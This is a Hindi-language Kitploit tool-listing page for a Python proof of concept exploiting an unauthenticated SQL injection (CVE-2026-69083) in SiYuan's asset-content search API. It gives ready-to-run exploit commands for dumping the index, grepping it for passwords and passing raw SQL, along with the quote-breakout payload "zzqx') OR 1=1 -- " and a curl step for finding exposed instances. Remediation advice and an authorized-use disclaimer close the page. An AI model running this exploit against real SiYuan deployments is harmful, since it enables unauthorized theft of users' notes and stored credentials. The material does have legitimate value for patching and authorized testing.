Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-69083_exploit — CVE-2026-69083 के लिए Python PoC, जो SiYuan के एसेट-कंटेंट खोज एंडपॉइंट में एक बिना प्रमाणीकरण वाला SQL इंजेक्शन है। अनुक्रमित एसेट और संलग्न SQLite डेटा को डंप करने के लिए REGEXP ब्रेकआउट और रॉ SQL पासथ्रू का समर्थन करता है। | Kitploit
उपकरण/GitHubGitHub/0xdak/cve-2026-69083_exploit
शोषणवेब एप्लिकेशन शोषणडेटा निष्कासनपेनिट्रेशन टेस्टिंगडेटाबेस सुरक्षा
GitHub0xdak/cve-2026-69083_exploit

CVE-2026-69083_exploit

CVE-2026-69083 के लिए Python PoC, जो SiYuan के एसेट-कंटेंट खोज एंडपॉइंट में एक बिना प्रमाणीकरण वाला SQL इंजेक्शन है। अनुक्रमित एसेट और संलग्न SQLite डेटा को डंप करने के लिए REGEXP ब्रेकआउट और रॉ SQL पासथ्रू का समर्थन करता है।

रिपॉजिटरी देखें
17 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-69083 — SiYuan बिना प्रमाणीकरण के SQL इंजेक्शन

SiYuan (एक Go-आधारित नॉलेज-बेस ऐप) में asset-content खोज एंडपॉइंट के माध्यम से बिना प्रमाणीकरण के SQL इंजेक्शन।

POST /api/search/fullTextSearchAssetContent उपयोगकर्ता-नियंत्रित query मान को बिना किसी एस्केपिंग के सीधे REGEXP क्लॉज़ में जोड़कर (concatenate करके) एक रॉ SQL स्टेटमेंट बनाता है (kernel/model/asset_content.go, assetContentFieldRegexp):

root@kitploit:~
SELECT * FROM `asset_contents_fts_case_insensitive`
WHERE (name REGEXP '<query>' OR content REGEXP '<query>') AND ext IN <types>

query में एक single quote स्ट्रिंग लिटरल से बाहर निकल जाता है (CWE-89)। जब SiYuan को बिना access-auth कोड (Conf.AccessAuthCode == "") के तैनात किया जाता है, तो पूरा kernel कॉल करने वालों को बिना किसी क्रेडेंशियल के एडमिनिस्ट्रेटर मानता है, इसलिए इंजेक्शन पूरी तरह से बिना प्रमाणीकरण के होता है। method:3 REGEXP break-out है; method:2 अतिरिक्त रूप से query को रॉ SQL स्टेटमेंट के रूप में पास करता है।

  • प्रभावित: SiYuan < 3.7.3
  • डिफ़ॉल्ट पोर्ट: 6806 (जब कोई accessAuthCode सेट नहीं होता तो बिना प्रमाणीकरण के)
  • CWE: 89 (SQL इंजेक्शन)
  • प्रभाव: asset-content SQLite डेटाबेस तक पढ़ने/लिखने की पहुंच (डेटा एक्सफ़िलट्रेशन; अन्य SQLite फ़ाइलों के लिए ATTACH DATABASE) — जैसे कि ऑपरेटरों द्वारा नोट्स में इंडेक्स किए गए क्रेडेंशियल डंप करना

आवश्यकताएँ

केवल Python 3 स्टैंडर्ड लाइब्रेरी — कोई निर्भरता नहीं।

उपयोग

root@kitploit:~
# dump the asset-content index (method 3 REGEXP break-out)
python3 exploit.py http://10.10.10.10:6806/

# only rows matching a keyword
python3 exploit.py http://10.10.10.10:6806/ --grep password

# method 2 raw SQL passthrough (select the 7 columns id,name,ext,path,size,updated,content)
python3 exploit.py http://10.10.10.10:6806/ \
  --sql "SELECT id,name,ext,path,size,updated,content FROM asset_contents_fts_case_insensitive"

यह कैसे काम करता है

डिफ़ॉल्ट पेलोड है:

root@kitploit:~
query = "zzqx') OR 1=1 -- "
  • zzqx') समूह (name REGEXP '...' को बंद करता है,
  • OR 1=1 WHERE क्लॉज़ को हमेशा सत्य बनाता है,
  • -- पंक्ति के बाकी हिस्से को कमेंट कर देता है, जिसमें अंतिम AND ext IN <types> भी शामिल है — जो अन्यथा types खाली होने पर सिंटैक्स त्रुटि है (SiYuan AND ext IN के बाद कुछ भी नहीं भेजता है, और kernel SQL त्रुटि पर चुपचाप कोई पंक्ति नहीं लौटाता)।

एंडपॉइंट फिर asset-content इंडेक्स की हर पंक्ति लौटाता है, और टूल प्रत्येक पंक्ति का content प्रिंट करता है।

लक्ष्य की पहचान करना

root@kitploit:~
curl -s http://10.10.10.10:6806/system_stats  # or browse http://10.10.10.10:6806/ (no login prompt)

पोर्ट 6806 पर चलने वाला SiYuan इंस्टेंस जो बिना access-auth कोड के लोड होता है, शोषण योग्य (exploitable) है।

समाधान

  • SiYuan ≥ 3.7.3 REGEXP क्वेरी (... REGEXP ?) को पैरामीटराइज़ करता है और method-2 रॉ-SQL पथ को एडमिनिस्ट्रेटर जांच के पीछे रखता है।
  • SiYuan को हमेशा --accessAuthCode के साथ चलाएँ; इसे कभी भी बिना प्रमाणीकरण के उजागर न करें — access-auth कोड के बिना पूरा kernel API एडमिनिस्ट्रेटर के लिए खुला रहता है।
  • इंडेक्स किए गए नोट्स/एसेट्स में प्लेनटेक्स्ट क्रेडेंशियल स्टोर न करें।

अस्वीकरण

केवल अधिकृत सुरक्षा परीक्षण और शिक्षा के लिए। इसका उपयोग केवल उन्हीं सिस्टमों पर करें जिनके स्वामी आप हैं या जिनके परीक्षण की आपके पास स्पष्ट अनुमति है।

टूल डाउनलोड करें